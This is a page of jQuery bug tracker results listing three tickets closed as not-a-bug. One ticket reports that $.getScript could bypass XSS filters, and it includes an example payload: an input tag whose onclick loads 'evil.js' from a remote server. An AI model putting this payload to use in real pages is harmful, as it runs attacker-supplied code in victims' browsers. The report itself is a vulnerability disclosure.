Bug Tracker

Custom Query (13852 matches)

Filters
 
Or
 
  
 
Columns

Show under each result:


Results (67 - 69 of 13852)

Ticket Resolution Summary Owner Reporter
#15168 notabug IE 8 not supported by jQuery 2.0.3 jdsharp Prakash Sankar
Description

Currently i am using 2.0.3 jQuery in my project. when i rollback to 1.x series by NuGet package manager console. I am getting the same error...

#15166 notabug $.getScript Function may cause XSS attack lupin
Description

$.getScript and can load JavaScript file from remote server,then execute it.

In some cases,if a attack can control this function or its parameter,this Function may cause XSS attack.

For example,if an attacker can control a HTML TAG (such as input tag).

<input type=text onclick=...>

An attacker can control the OnClick Event,but the web app filter evil characters(<script>,doucment...).In this case XSS can not occur,but if the web page contains JQuery library,the attacker can bypass the Filter Mechanism using $.getScript Function,like this.

<input type=text onclick=$.getScript('http://jquery.com/evil.js')>

The attacker put evil.js on his remote server,this JavaScript File contains evil JavaScript code.When a user click the input tag ,the evil javascript code will execute.

I think JQuery Libiary should add a white list,a web can only load a JavaScript File from current domain by default,if a web need to load a JavaScript File from remote server,the developer have to add the domain into the white list.

#15165 notabug jQuery .offset().top wrong on refresh of page Knecker
Description

When getting .offset().top from an relative positioned element, eg. div, in combination with .scroll, .offset reports wrong value once at a refresh. (Occuring in Firefox 31).

Construction Example:
$(window).scroll(function(){

var test = $("#something").offset().top);


console.log(test);

};

Related stackoverflow thread: http://stackoverflow.com/questions/11649454/jquery-offset-wrong-on-refresh-of-page

Note: See TracQuery for help on using queries.